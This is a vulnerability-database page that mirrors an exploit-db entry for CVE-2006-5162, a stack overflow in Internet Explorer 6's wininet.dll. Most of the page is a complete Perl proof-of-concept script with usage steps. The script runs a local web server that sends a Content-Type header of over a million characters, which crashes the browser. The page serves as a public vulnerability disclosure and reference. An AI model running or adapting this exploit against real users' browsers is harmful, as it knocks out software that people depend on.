Lucene search
+L

Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash

🗓️ 20 Jul 2006 00:00:00Reported by FirestormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash discovered by Firestor

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5162
3 Oct 200623:00
cve
cvelist
Cvelist
CVE-2006-5162
3 Oct 200623:00
cvelist
nvd
NVD
CVE-2006-5162
5 Oct 200604:04
nvd
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage:
#	  1) run this code
#       2) open http://127.0.0.1/ with IE
#

use IO::Socket;
my $sock=new IO::Socket::INET (Listen    => 1,
                                 LocalAddr => 'localhost',
                                 LocalPort => 80,
                                 Proto     => 'tcp');
die unless $sock;
$huge="A" x 1100000;
$|=1;
print ">http server started on port 80... try 'iexplore http://127.0.0.1/' \n";
$z=$sock->accept();
print ">connection!\n";
do
{
	$ln=<$z>;
	print $ln;
	chomp $ln;

	if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
	{
		print ">sending response\n";
		print $z "HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
		close($z);
		exit;
	}
} while (true);

# milw0rm.com [2006-07-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.35825
39